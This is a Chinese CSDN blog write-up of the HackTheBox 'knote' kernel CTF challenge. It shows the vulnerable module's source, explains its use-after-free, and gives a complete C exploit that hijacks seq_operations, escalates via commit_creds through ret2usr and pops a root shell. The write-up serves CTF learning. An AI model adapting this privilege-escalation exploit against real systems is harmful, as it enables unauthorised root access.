HackTheBox_knote

已于 2024-05-04 19:50:50 修改
阅读量232 收藏 10
点赞数 4
分类专栏: # kernel-pwn 文章标签: checkin
于 2024-05-04 19:32:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/138448121
版权

前言

最近打算刷一些内核利用的 CTF 的题目~~~

题目分析

  • 内核版本:v5.8.3,但是没有开启 cg 隔离
  • smap/smep/kpti/kaslr 全关,可以 ret2usr,所以应该是比较老的题目了(:这里很奇怪的是就算设置 kaslr 但是也无法开启
  • 然后 CONFIG_SLAB_FREELIST_RANDOMCONFIG_SLAB_FREELIST_HARDENED 都没有开启(:这里利用工具查出来 CONFIG_SLAB_FREELIST_RANDOM 是开启的,但是调试可以知道其没有开启

题目给了源码:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/uaccess.h>

#define DEVICE_NAME "knote"
#define CLASS_NAME "knote"

MODULE_AUTHOR("r4j");
MODULE_DESCRIPTION("Secure your secrets in the kernelspace");
MODULE_LICENSE("GPL");

static DEFINE_MUTEX(knote_ioctl_lock);
static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg);

static int major;
static struct class *knote_class  = NULL;
static struct device *knote_device = NULL;
static struct file_operations knote_fops = {
    .unlocked_ioctl = knote_ioctl
};

struct knote {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
};

struct knote_user {
    unsigned long idx;
    char * data;
    size_t len;
};

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};

struct knote *knotes[10];

void knote_encrypt(char * data, size_t len) {
    int i;
    for(i = 0; i < len; ++i)
        data[i] ^= 0xaa;
}

void knote_decrypt(char *data, size_t len) {
    knote_encrypt(data, len);
}

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;
    switch(cmd) {
        case KNOTE_CREATE:
			// len [0, 0x20]
			// idx [0, 0x10)
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            if(data == NULL || knotes[ku.idx] == NULL) {
                mutex_unlock(&knote_ioctl_lock);
                return -ENOMEM;
            }

            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]); // 没有清空 knotes[ku.idx]
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        case KNOTE_DELETE:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            knotes[ku.idx] = NULL;
            break;
        case KNOTE_READ:
            if(ku.idx >= 10 || !knotes[ku.idx] || ku.len > knotes[ku.idx]->len) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            if(copy_to_user(ku.data, knotes[ku.idx]->data, ku.len)) {
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            break;
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         case KNOTE_DECRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->decrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

static int __init init_knote(void) {
    major = register_chrdev(0, DEVICE_NAME, &knote_fops);
    if(major < 0)
        return -1;

    knote_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(knote_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    knote_device = device_create(knote_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
    if (IS_ERR(knote_device))
    {
        class_destroy(knote_class);
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    return 0;
}

static void __exit exit_knote(void)
{
    device_destroy(knote_class, MKDEV(major, 0));
    class_unregister(knote_class);
    class_destroy(knote_class);
    unregister_chrdev(major, DEVICE_NAME);
}

module_init(init_knote);
module_exit(exit_knote);

题目实现了一个菜单堆,具体增删查的功能,然后还有两个加解密功能,堆块大小限制为 [0, 0x20],然后最多同时创建 10note,维护的结构体如下:
在这里插入图片描述
主要的漏洞点在于在创建 note 时,如果赋值用户态数据失败则释放掉已经分配的堆块,但是这里没有将 knotes[ku.idx]NULL,从而导致 UAF/Double Free

漏洞利用

这里没有给写的功能,所以得想办法写入,然后这里先假设有 smap/smep/kaslr/pti 等保护应该如何利用(:其实这里存在 0x20 大小的 double free,所以可以利用之前笔者总结的 DCO 方式进行利用,这里不过多说明,具体参考笔者之前的文章

然后笔者最开始想的是利用 user_key_payload + setxattr 实现越界读,但是似乎 add_key 用不了(:应该没编译相关模块

然后回到题目中保护全关的情况下,注意题目中 note 结构体的大小也是 0x20,所以构造循环 freelist

  • 先分配一个 note 0data 大小也为 0x20,这里使得复制数据失败,从而释放相关堆块(:这里调试可以知道 next 指针存放在 0x10 位置
    在这里插入图片描述
  • 然后在释放 note0,此时构成循环 freelist
    在这里插入图片描述
  • 此时分配 seq_operations 占据堆块
    在这里插入图片描述
  • 然后在利用 setxattr 修改 seq_operationsstart 指针从而实现 ret2usr

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <sys/xattr.h>


void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(2);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }
    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

struct knote {
    unsigned long idx;
    char * buf;
    size_t len;
};

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};

int fd;
void add(uint64_t idx, void* buf, size_t len) {
        struct knote n = { .idx = idx, .buf = buf, .len = len };
        ioctl(fd, KNOTE_CREATE, &n);
}

void del(size_t idx) {
        struct knote n = { .idx = idx };
        ioctl(fd, KNOTE_DELETE, &n);
}

void show(size_t idx, void* buf, size_t len) {
        struct knote n = { .idx = idx, .buf = buf, .len = len };
        ioctl(fd, KNOTE_READ, &n);
}

void enc(size_t idx) {
        struct knote n = { .idx = idx };
        ioctl(fd, KNOTE_DELETE, &n);
}

void dec(size_t idx) {
        struct knote n = { .idx = idx };
        ioctl(fd, KNOTE_DELETE, &n);
}

static size_t prepare_kernel_cred = 0xffffffff81053c50;
static size_t commit_creds = 0xffffffff81053a30;
static size_t shell = (size_t)get_root_shell;
void get_root_privilige()
{
        asm volatile (
        "mov rdi, 0;"
        "mov r14, prepare_kernel_cred;"
        "call r14;"
        "mov rdi, rax;"
        "mov r14, commit_creds;"
        "call r14;"
        "swapgs;"
        "mov r14, user_ss;"
        "push r14;"
        "mov r14, user_sp;"
        "push r14;"
        "mov r14, user_rflags;"
        "push r14;"
        "mov r14, user_cs;"
        "push r14;"
        "mov r14, shell;"
        "push r14;"
        "iretq;"
        );
}

int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        save_status();
        int res;
        int seq_fd;
        int key_id;
        int fds[20];
        char buf[0x20];
        memset(buf, 'A', sizeof(buf));
        fd = open("/dev/knote", O_RDONLY);
        if (fd < 0) err_exit("open /dev/knote");

        for (int i = 0; i < 20; i++) {
                fds[i] = open("/proc/self/stat", O_RDONLY);
        }

        add(0, (void*)0xdeadbeef, 0x20);
        del(0);

        seq_fd = open("/proc/self/stat", O_RDONLY);
        if (seq_fd < 0) err_exit("open seq file");
        open("/proc/self/stat", O_RDONLY);

        size_t evil[4] = { (size_t)get_root_privilige, 0xffffffff810f1800, 0xffffffff810f17f0, 0xffffffff811082e0 };
        setxattr("./", "Pwner", evil, 0x20, 0);

        for (int i = 0; i < 20; i++) {
                close(fds[i]);
        }

        read(seq_fd, buf, 1);
        return 0;
}

效果如下:
在这里插入图片描述
题目如果开启了 smap/smep 可以考虑打 pt_regs 。然后这里还可以通过劫持 encrypt_func/decrypt_func 指针去控制程序执行流。

XiaozaYa
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android代码-Knote
08-06
knote-android Knote - Simple Note Apps for Android
酷比魔方knote5 青春版触屏驱动问题
qq_40036189的博客
08-13 1756
前些日子为了方便,买了一个二手的酷比魔方knote5青春版。但是可能因为是屏幕的厂商太小众了,驱动软件上没有相应的驱动。导致我换完系统后触屏功能用不了,所以我从原厂的固件里,把驱动提出来。有需要的朋友,可以下载来,用驱动精灵还原就得了。 ...
酷比魔方KNote GO安装Linux
baigang1986的博客
09-03 1484
无法安装 CentOS,测试了下Arch, 流畅程度一般。 再装回win10 转载于:https://www.cnblogs.com/mc-r/p/11455175.html
0ctf 2017 kernel pwn knote write up
weixin_30354675的博客
04-07 164
UAF due to using hlist_add_behind() without checking. There isa pair locker(mutex_lock) at delete_note(), but isn’t at edit_note_time(). And it doesn’t check theflagbeforehlist_add_behind()...
xctf中php_rec的writeup,第十届全国大学生信息安全竞赛writeup
weixin_32589877的博客
03-13 1120
1.PHP execise 类型:WEB 分值:150分直接就能执行代码,先执行phpinfo(),发现禁用了如下函数assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl...
Knote:结合 KaTeX 和 CommonMark 的基于 Web 的记事本
06-10
结 这是一个支持和 Markdown 的在线记事本。 有一天,在Google Drive上做数学笔记时,我意识到在一个简单、轻量级、基于云的应用程序中拥有 LaTeX 数学的强大功能是多么有用。 它与 Dropbox 的Datastore API挂钩,...
springboot-knote:简单的Spring Boot应用程序做笔记
02-13
springboot-knote
酷比魔方i10驱动包(含触屏驱动)
09-16
酷比魔方i10驱动包(含触屏驱动) 第一步: 先安装主板驱动:进入“Installer”...第二步: 重启后安装触屏驱动:触屏驱动在TP文件夹下,有两种型号的(GG开头和PG开头的),在对应文件夹下打开install.bat即可完成安装
KNotepaper 便笺本
01-13
======================《便笺本》用于日常记事======================菜鸟作品请勿见笑还望大鸟批评指正说明:1、学习ini文件的使用;2、学习ListView的使用;3、源文件未作进一步修饰;4、哪个兄弟作了修改还望...
基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip
05-22
基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统源码+数据集+详细文档(高分毕业设计).zip基于网络的入侵检测系统
本户型为2层独栋别墅D026-两层-13.14&12.84米-施工图.dwg
05-22
本户型为2层独栋别墅,建筑面积239平方米,占地面积155平米;一层建筑面积155平方米,设有客厅、餐厅、厨房、卧室3间、卫生间1间、杂物间;二层建筑面积84平方米,设有卧室2间、卫生间1间、储藏间、1个大露台。 本户型外观造型别致大方,采光通风良好,色彩明快,整体平面布局紧凑、功能分区合理,房间尺度设计适宜,豪华大气,富有时代气息。
Java_带有可选web的开源命令行RatioMaster.zip
05-22
Java_带有可选web的开源命令行RatioMaster
基于MATLAB实现的OFDM经典同步算法之一Park算法仿真,附带Park算法经典文献+代码文档+使用说明文档.rar
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的OFDM经典同步算法之一Park算法仿真,附带Park算法经典文献+代码文档+使用说明文档.rar 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
基于MATLAB实现的对机械振动信号用三维能量谱进行分析+使用说明文档.rar
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的对机械振动信号用三维能量谱进行分析+使用说明文档.rar 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
grpcio-1.49.0-cp310-cp310-manylinux_2_17_aarch64.whl
05-22
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
基于MATLAB实现的组合搜索的完整代码+使用说明文档.zip
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的组合搜索的完整代码+使用说明文档.zip 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
月酝知风之地产行业基本面再度走弱核心城市政策空间打开-21页.pdf.zip
05-22
月酝知风之地产行业基本面再度走弱核心城市政策空间打开-21页.pdf.zip
大学生毕业答辨ppt免费模板【不要积分】下载可编辑可用(104).zip
05-22
大学生毕业答辨ppt免费模板【不要积分】下载可编辑可用(104).zip
2G、3G、4G最小站间距计算V1.1.xlsm
最新发布
05-22
2G、3G、4G最小站间距计算V1.1

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值